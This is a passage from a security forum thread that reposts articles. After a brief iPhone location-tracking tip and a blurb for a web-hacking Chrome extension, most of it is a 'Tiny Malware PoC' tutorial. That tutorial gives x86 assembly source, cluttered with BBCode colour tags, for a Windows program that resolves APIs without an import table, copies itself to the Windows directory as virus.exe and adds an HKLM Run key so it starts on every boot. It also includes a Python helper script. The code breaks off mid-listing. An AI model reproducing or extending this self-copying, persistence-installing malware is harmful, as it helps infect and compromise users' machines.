settings. Ignore the privacy option. You can turn off “location services” for apps there, but to get to the passive tracking, head to the “General” area. Choose “Background App Refresh.” Turn it off entirely — which is good for battery life — or pick and choose the apps you trust not to abuse their “background power.” Those apps that passively track location have a little blue arrow next to them. Choose wisely. Sursa: Change This iPhone Setting To Stop Closed Apps From Tracking Your Location - Forbes
  18. [h=3]Web-fu - the ultimate web hacking chrome extension[/h]Web-fu Is a web hacking tool focused on discovering and exploiting web vulnerabilitites. BROWSER INTEGRATION This tool has many advantages, the tool is a chrome extension and therefore if the browser can authenticate and access to the web application, the tool also can. The integration with chrome, makes a very comfortable and agile way of web-hacking, and you have all the application data loaded on the hacking tool, you don't need to copy the url, cookies, etc. to the tool, just right click and hack. The browser rendering engine is also used in this tool, to draw the html of the responses. FALSES POSITIVES When I coded this tool, I was obsessed with false positives, which is the main problem in all detection tools. I have implemented a gauss algorithm, to reduce the faslse positives automatically which works very very well, and save a lot of time to the pentester. Link: software security blog: Web-fu - the ultimate web hacking chrome extension
  19. Tiny Malware PoC: Malware Without IAT, DATA OR Resource Section Submitted by siteadm on Wed, 08/13/2014 - 21:58 Have you ever wondered about having an EXE without any entry in IAT (Import Address Table) at all? Well, I knew that it's possible, but never saw an actual exe file without IAT entry. So I developed an application which is 1,536 bytes and still does basic annoying malware things. So to summarize, this tiny app: - Enumerates following APIs: Kernel32 GetProcAddress VirtualAlloc GetModuleFileNameA ExitProcess CopyFileA GetWindowsDirectoryA LoadLibraryA Advapi32 RegCreateKeyA RegSetKeyValueA RegCloseKey User32 MessageBoxA - Allocates 0x0B000 bytes in fixed memory location (0x0C000000) - Resolves and stores all DLL handles, API function addresses, strings and API call return values in this newly allocated memory page. - Copies itself to Windows directory under virus.exe name - Creates a startup key in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run called viri and points to virus.exe in %WINDIR% - Shows a MessageBox with "Infected!" string as title and text of message. - Terminates itself So this is basically what I did, but developing it and extending it is just a matter of time. Anyway, let's see the code: Beginning of file is just finding Kernel32 handle and offset of export table of Kernel32.dll [COLOR=#008000][[/COLOR]section[COLOR=#008000]][/COLOR] .[COLOR=#007788]text[/COLOR] BITS [COLOR=#0000dd]32[/COLOR] global _start _start[COLOR=#008080]:[/COLOR] xor ecx,ecx mov eax,[COLOR=#008000][[/COLOR]fs[COLOR=#008080]:[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x30[/COLOR][COLOR=#008000]][/COLOR] mov eax,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0xc[/COLOR][COLOR=#008000]][/COLOR] mov esi,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x14[/COLOR][COLOR=#008000]][/COLOR] lodsd xchg eax,esi lodsd mov ebx,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x10[/COLOR][COLOR=#008000]][/COLOR] mov edx,[COLOR=#008000][[/COLOR]ebx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x3c[/COLOR][COLOR=#008000]][/COLOR] add edx,ebx mov edx,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x78[/COLOR][COLOR=#008000]][/COLOR] add edx,ebx mov esi,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x20[/COLOR][COLOR=#008000]][/COLOR] add esi,ebx xor ecx,ecx xor ecx,ecx mov eax,[COLOR=#008000][[/COLOR]fs[COLOR=#008080]:[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x30[/COLOR][COLOR=#008000]][/COLOR] mov eax,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0xc[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] EAX [COLOR=#000080]=[/COLOR] PEB[COLOR=#000040]-[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR]Ldr mov esi,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x14[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] PEB[COLOR=#000040]-[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR]Ldr.[COLOR=#007788]InMemOrder[/COLOR] lodsd [COLOR=#008080];[/COLOR] EAX [COLOR=#000080]=[/COLOR] Second module xchg eax,esi [COLOR=#008080];[/COLOR] EAX [COLOR=#000080]=[/COLOR] ESI, ESI [COLOR=#000080]=[/COLOR] EAX lodsd [COLOR=#008080];[/COLOR] EAX [COLOR=#000080]=[/COLOR] Third [COLOR=#008000]([/COLOR]kernel32[COLOR=#008000])[/COLOR] mov ebx,[COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x10[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] EBX [COLOR=#000080]=[/COLOR] Base address mov edx,[COLOR=#008000][[/COLOR]ebx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x3c[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] DOS[COLOR=#000040]-[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR]e_lfanew add edx,ebx [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] PE Header mov edx,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x78[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] Offset export table add edx,ebx [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] Export table mov esi,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x20[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Offset names table add esi,ebx [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Names table xor ecx,ecx [COLOR=#008080];[/COLOR] EXC [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]0[/COLOR] tryagain[COLOR=#008080]:[/COLOR] inc ecx [COLOR=#008080];[/COLOR] Loop [COLOR=#0000ff]for[/COLOR] each function lodsd add eax,ebx [COLOR=#008080];[/COLOR] Loop untill function name cmp dword [COLOR=#008000][[/COLOR]eax[COLOR=#008000]][/COLOR],[COLOR=#208080]0x50746547[/COLOR] [COLOR=#008080];[/COLOR] GetP jnz tryagain cmp dword [COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x4[/COLOR][COLOR=#008000]][/COLOR],[COLOR=#208080]0x41636f72[/COLOR] [COLOR=#008080];[/COLOR] rocA jnz tryagain cmp dword [COLOR=#008000][[/COLOR]eax[COLOR=#000040]+[/COLOR][COLOR=#208080]0x8[/COLOR][COLOR=#008000]][/COLOR],[COLOR=#208080]0x65726464[/COLOR] [COLOR=#008080];[/COLOR] ddre jnz tryagain mov esi,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x24[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Offset ordinals add esi,ebx [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Ordinals table mov cx,[COLOR=#008000][[/COLOR]esi[COLOR=#000040]+[/COLOR]ecx[COLOR=#000040]*[/COLOR][COLOR=#0000dd]2[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] CX [COLOR=#000080]=[/COLOR] Number of function dec ecx mov esi,[COLOR=#008000][[/COLOR]edx[COLOR=#000040]+[/COLOR][COLOR=#208080]0x1c[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Offset address table add esi,ebx [COLOR=#008080];[/COLOR] ESI [COLOR=#000080]=[/COLOR] Address table mov edx,[COLOR=#008000][[/COLOR]esi[COLOR=#000040]+[/COLOR]ecx[COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] Pointer[COLOR=#008000]([/COLOR]offset[COLOR=#008000])[/COLOR] add edx,ebx [COLOR=#008080];[/COLOR] EDX [COLOR=#000080]=[/COLOR] GetProcAddress As first step, we try to find VirtualAlloc API address: xor ecx,ecx [COLOR=#008080];[/COLOR] ECX [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]0[/COLOR] PUSH [COLOR=#0000dd]0[/COLOR] push ebx [COLOR=#008080];[/COLOR] Kernel32 base address push edx [COLOR=#008080];[/COLOR] GetProcAddress push ecx [COLOR=#008080];[/COLOR] [COLOR=#0000dd]0[/COLOR] push [COLOR=#0000dd]0[/COLOR] push [COLOR=#208080]0x636f6c6c[/COLOR] push [COLOR=#208080]0x416c6175[/COLOR] push [COLOR=#208080]0x74726956[/COLOR] [COLOR=#008080];[/COLOR] VirtualAlloc push esp push ebx [COLOR=#008080];[/COLOR] Kernel32 base address call edx [COLOR=#008080];[/COLOR] GetProcAddress[COLOR=#008000]([/COLOR]LL[COLOR=#008000])[/COLOR] PUSH eax As you can see the pushing string into stack and calling PUSH ESP does the trick, so as I needed to do this so often, I wrote a small Python code to generate this type of assembly instruction for a given String: import sys [COLOR=#0000ff]if[/COLOR] len[COLOR=#008000]([/COLOR]sys.[COLOR=#007788]argv[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#000040]&[/COLOR]lt[COLOR=#008080];[/COLOR] [COLOR=#0000dd]2[/COLOR][COLOR=#008080]:[/COLOR] print [COLOR=#FF0000]"Please provide a string argument"[/COLOR] [COLOR=#0000dd]exit[/COLOR] APIName [COLOR=#000080]=[/COLOR] sys.[COLOR=#007788]argv[/COLOR][COLOR=#008000][[/COLOR][COLOR=#0000dd]1[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#0000ff]if[/COLOR] len[COLOR=#008000]([/COLOR]APIName[COLOR=#008000])[/COLOR] [COLOR=#000040]%[/COLOR] [COLOR=#0000dd]4[/COLOR] [COLOR=#000040]![/COLOR][COLOR=#000080]=[/COLOR] [COLOR=#0000dd]0[/COLOR][COLOR=#008080]:[/COLOR] APIName [COLOR=#000080]=[/COLOR] APIName.[COLOR=#007788]ljust[/COLOR][COLOR=#008000]([/COLOR][COLOR=#008000]([/COLOR][COLOR=#008000]([/COLOR]len[COLOR=#008000]([/COLOR]APIName[COLOR=#008000])[/COLOR][COLOR=#000040]/[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#008000])[/COLOR][COLOR=#000040]+[/COLOR][COLOR=#0000dd]1[/COLOR][COLOR=#008000])[/COLOR][COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR], [COLOR=#FF0000]'[COLOR=#006699][B]\0[/B][/COLOR]'[/COLOR][COLOR=#008000])[/COLOR] print [COLOR=#FF0000]"push 0"[/COLOR] [COLOR=#0000ff]for[/COLOR] i in range[COLOR=#008000]([/COLOR][COLOR=#0000dd]1[/COLOR], [COLOR=#008000]([/COLOR][COLOR=#008000]([/COLOR]len[COLOR=#008000]([/COLOR]APIName[COLOR=#008000])[/COLOR] [COLOR=#000040]/[/COLOR] [COLOR=#0000dd]4[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#000040]+[/COLOR][COLOR=#0000dd]1[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008080]:[/COLOR] print [COLOR=#FF0000]"push "[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#FF0000]"0x"[/COLOR][COLOR=#000040]+[/COLOR][COLOR=#FF0000]"{0:02x}"[/COLOR].[COLOR=#007788]format[/COLOR][COLOR=#008000]([/COLOR]ord[COLOR=#008000]([/COLOR]APIName[COLOR=#008000][[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#008000]([/COLOR]i[COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#0000dd]3[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000]][/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#FF0000]"{0:02x}"[/COLOR].[COLOR=#007788]format[/COLOR][COLOR=#008000]([/COLOR]ord[COLOR=#008000]([/COLOR]APIName[COLOR=#008000][[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#008000]([/COLOR]i[COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#0000dd]2[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000]][/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#FF0000]"{0:02x}"[/COLOR].[COLOR=#007788]format[/COLOR][COLOR=#008000]([/COLOR]ord[COLOR=#008000]([/COLOR]APIName[COLOR=#008000][[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#008000]([/COLOR]i[COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#0000dd]1[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000]][/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#FF0000]"{0:02x}"[/COLOR].[COLOR=#007788]format[/COLOR][COLOR=#008000]([/COLOR]ord[COLOR=#008000]([/COLOR]APIName[COLOR=#008000][[/COLOR][COLOR=#000040]-[/COLOR][COLOR=#008000]([/COLOR]i[COLOR=#000040]*[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000]][/COLOR][COLOR=#008000])[/COLOR][COLOR=#008000])[/COLOR] print [COLOR=#FF0000]"push esp ;"[/COLOR] [COLOR=#000040]+[/COLOR] APIName You can simply run this Python script with a string as parameter and it produces required ASM instruction for pushing given string into stack, example call and output: C[COLOR=#008080]:[/COLOR]\[COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR]APINameToASM.[COLOR=#007788]py[/COLOR] user32.[COLOR=#007788]dll[/COLOR] push [COLOR=#0000dd]0[/COLOR] push [COLOR=#208080]0x00006c6c[/COLOR] push [COLOR=#208080]0x642e3233[/COLOR] push [COLOR=#208080]0x72657375[/COLOR] push esp [COLOR=#008080];[/COLOR]user32.[COLOR=#007788]dll[/COLOR] Now we allocate a fixed size, fixed location memory page to store all strings and resolved API pointers: PUSH [COLOR=#208080]0x40[/COLOR] [COLOR=#008080];[/COLOR] DWORD flProtect [COLOR=#000080]=[/COLOR] PAGE_EXECUTE_READWRITE PUSH [COLOR=#208080]0x3000[/COLOR][COLOR=#008080];[/COLOR] DWORD flAllocationType [COLOR=#000080]=[/COLOR] MEM_COMMIT [COLOR=#000040]|[/COLOR] MEM_RESERVE PUSH [COLOR=#208080]0x0B000[/COLOR][COLOR=#008080];[/COLOR] SIZE_T dwSize PUSH [COLOR=#208080]0x0C000000[/COLOR] [COLOR=#008080];[/COLOR] LPVOID lpAddress CALL EAX [COLOR=#008080];[/COLOR] call VirtualAlloc From now on, we store all resolved API pointers in 0x0c000000 address. Whole table after running application will look like this: [COLOR=#208080]0x0c000000[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] Kernel32 handle [COLOR=#208080]0x0C000004[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] GetProcAddress pointer [COLOR=#208080]0x0C000008[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] VirtualAlloc pointer [COLOR=#208080]0x0C00000C[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] GetModuleFileNameA pointer [COLOR=#208080]0x0C000010[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] ExitProcess pointer [COLOR=#208080]0x0C000014[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] CopyFileA pointer [COLOR=#208080]0x0C000018[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] GetWindowsDirectoryA pointer [COLOR=#208080]0x0C00001C[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] LoadLibraryA pointer [COLOR=#008080];[/COLOR] space [COLOR=#0000ff]for[/COLOR] [COLOR=#0000dd]40[/COLOR] kernel32 function address [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]40[/COLOR] x [COLOR=#0000dd]4[/COLOR] [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]160[/COLOR] in decimal [COLOR=#008000]([/COLOR][COLOR=#208080]0xA0[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#008080];[/COLOR] [COLOR=#208080]0xA0[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#208080]0x04[/COLOR] [COLOR=#000080]=[/COLOR] [COLOR=#208080]0xA4[/COLOR] beginning of Advapi [COLOR=#208080]0x0C0000A4[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] Advapi32 handle [COLOR=#208080]0x0C0000A8[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] RegCreateKeyA pointer [COLOR=#208080]0x0C0000AC[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] RegSetKeyValueA pointer [COLOR=#208080]0x0C000060[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] RegCloseKey pointer [COLOR=#008080];[/COLOR] space [COLOR=#0000ff]for[/COLOR] [COLOR=#0000dd]40[/COLOR] user32.[COLOR=#007788]dll[/COLOR] function address [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]40[/COLOR] x [COLOR=#0000dd]4[/COLOR] [COLOR=#000080]=[/COLOR] [COLOR=#0000dd]160[/COLOR] in decimal [COLOR=#008000]([/COLOR][COLOR=#208080]0xA0[/COLOR][COLOR=#008000])[/COLOR] [COLOR=#008080];[/COLOR] [COLOR=#208080]0xA4[/COLOR] [COLOR=#000040]+[/COLOR] [COLOR=#208080]0xA4[/COLOR] [COLOR=#000080]=[/COLOR] [COLOR=#208080]0x148[/COLOR] beginning of User32 [COLOR=#208080]0x0C000148[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] User32 handle [COLOR=#208080]0x0C00014C[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] MessageBoxA pointer Also I used same memory page to store strings, for example: [COLOR=#208080]0x0C00AEF0[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] Current EXE file path [COLOR=#008000]([/COLOR]returned by GetModuleFileName API[COLOR=#008000])[/COLOR] [COLOR=#208080]0x0C00ADEC[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] Windows Directory path [COLOR=#008000]([/COLOR]returned by GetWindowsDirectory API[COLOR=#008000])[/COLOR] [COLOR=#208080]0x0C00ADE5[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] [COLOR=#FF0000]"viri"[/COLOR] string [COLOR=#008000]([/COLOR]registry value name[COLOR=#008000])[/COLOR] [COLOR=#208080]0x0C00AB8C[/COLOR] [COLOR=#000080]=[/COLOR][COLOR=#000040]&[/COLOR]gt[COLOR=#008080];[/COLOR] [COLOR=#FF0000]"Infected!"[/COLOR] string Also I created 3 functions to resolve API pointers easier: EnumKernelAPI[COLOR=#008080]:[/COLOR] POP EBP [COLOR=#008080];[/COLOR] ret addr MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] kernel32 handle call dword [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x04[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] getprocaddress MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH EBP retn EnumAdvapiAPI[COLOR=#008080]:[/COLOR] POP EBP [COLOR=#008080];[/COLOR] ret addr MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xA4[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] advapi32 handle call dword [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x04[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] getprocaddress MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH EBP retn EnumUserAPI[COLOR=#008080]:[/COLOR] POP EBP [COLOR=#008080];[/COLOR] ret addr MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x148[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] user32 handle call dword [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x04[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] getprocaddress MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH EBP retn Also you need to call ExitProcess to prevent crashing, so: TerminateProcess[COLOR=#008080]:[/COLOR] PUSH [COLOR=#0000dd]0[/COLOR][COLOR=#008080];[/COLOR] dwExitCode MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] CALL DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x10[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] call ExitProcess is necessary. After resolving APIs, calling them is really easy, for example: MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] push [COLOR=#0000dd]1[/COLOR] [COLOR=#008080];[/COLOR] bFailIfExists [COLOR=#000080]=[/COLOR] [COLOR=#0000ff]false[/COLOR] push [COLOR=#208080]0xC00ADEC[/COLOR] [COLOR=#008080];[/COLOR] [COLOR=#000040]%[/COLOR]WINDIR[COLOR=#000040]%[/COLOR]\Virus.[COLOR=#007788]exe[/COLOR] push [COLOR=#208080]0x0C00AEF0[/COLOR] [COLOR=#008080];[/COLOR] Current EXE path call dword[COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0x14[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] CopyFileA Result: Another call: mov ecx, [COLOR=#208080]0xC00ADAC[/COLOR][COLOR=#008080];[/COLOR] location of subkey mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]44[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x0000006e[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]40[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x75525c6e[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]36[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x6f697372[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]32[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x6556746e[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]28[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x65727275[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]24[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x435c7377[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]20[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x6f646e69[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]16[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x575c7466[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]12[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x6f736f72[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]8[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x63694d5c[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#0000dd]4[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x65726177[/COLOR] mov dword[COLOR=#008000][[/COLOR]ecx[COLOR=#008000]][/COLOR], [COLOR=#208080]0x74666f53[/COLOR] [COLOR=#008080];[/COLOR]Software\Microsoft\Windows\CurrentVersion\Run push [COLOR=#208080]0xC00ADE0[/COLOR] [COLOR=#008080];[/COLOR] PHKEY phkResult push [COLOR=#208080]0xC00ADAC[/COLOR] [COLOR=#008080];[/COLOR] lpSubkey [COLOR=#000080]=[/COLOR] Software\Microsoft\Windows\CurrentVersion\Run push [COLOR=#208080]0x80000002[/COLOR][COLOR=#008080];[/COLOR] HKEY [COLOR=#000080]=[/COLOR] HKEY_LOCAL_MACHINE mov ecx, [COLOR=#208080]0x0C000000[/COLOR] call dword[COLOR=#008000][[/COLOR]ecx[COLOR=#000040]+[/COLOR][COLOR=#208080]0xA8[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] RegCreateKeyA mov ecx, [COLOR=#208080]0x0C000000[/COLOR] MOV DWORD[COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xADE5[/COLOR][COLOR=#008000]][/COLOR], [COLOR=#208080]0x69726976[/COLOR] [COLOR=#008080];[/COLOR] viri string, will be used as registry value name MOV EDI, [COLOR=#208080]0xC00ADEC[/COLOR] [COLOR=#008080];[/COLOR] Address of C[COLOR=#008080]:[/COLOR]\Windows\Virus.[COLOR=#007788]exe[/COLOR] string SUB ECX,ECX SUB AL,AL NOT ECX CLD REPNE SCASB NOT ECX DEC ECX [COLOR=#008080];[/COLOR] Length of C[COLOR=#008080]:[/COLOR]\Windows\Virus.[COLOR=#007788]exe[/COLOR], instead of hardcoding, we calculate it dynamically, incase some computers have Windows installed in WINNT or any other name MOV EBX, [COLOR=#208080]0x0C000000[/COLOR] MOV EDI, [COLOR=#208080]0xC00ADEC[/COLOR] PUSH ECX [COLOR=#008080];[/COLOR] DWORD cbData [COLOR=#008000]([/COLOR]length of C[COLOR=#008080]:[/COLOR]\Windows\Virus.[COLOR=#007788]exe[/COLOR][COLOR=#008000])[/COLOR] PUSH EDI [COLOR=#008080];[/COLOR] LPCVOID lpData [COLOR=#008000]([/COLOR]C[COLOR=#008080]:[/COLOR]\Windows\Virus.[COLOR=#007788]exe[/COLOR][COLOR=#008000])[/COLOR] PUSH [COLOR=#0000dd]1[/COLOR] [COLOR=#008080];[/COLOR] DWORD dwTYPE [COLOR=#000080]=[/COLOR] REG_SZ PUSH [COLOR=#208080]0x0C00ADE5[/COLOR] [COLOR=#008080];[/COLOR] LPCTSTR lpValueName [COLOR=#000080]=[/COLOR] viri PUSH [COLOR=#0000dd]0[/COLOR] [COLOR=#008080];[/COLOR] LPCTSTR lpSubKey [COLOR=#000080]=[/COLOR] [COLOR=#0000ff]NULL[/COLOR] [COLOR=#008000]([/COLOR]will use already open key[COLOR=#008000])[/COLOR] PUSH DWORD [COLOR=#008000][[/COLOR]EBX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xADE0[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] HKEY hKey [COLOR=#000080]=[/COLOR] output of previous RegCreateKeyA call CALL DWORD [COLOR=#008000][[/COLOR]EBX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xAC[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] RegSetKeyValue MOV ECX, [COLOR=#208080]0x0C000000[/COLOR] PUSH DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xADE0[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] HKEY hKey[COLOR=#008080];[/COLOR] Call DWORD [COLOR=#008000][[/COLOR]ECX[COLOR=#000040]+[/COLOR][COLOR=#208080]0xB0[/COLOR][COLOR=#008000]][/COLOR] [COLOR=#008080];[/COLOR] call 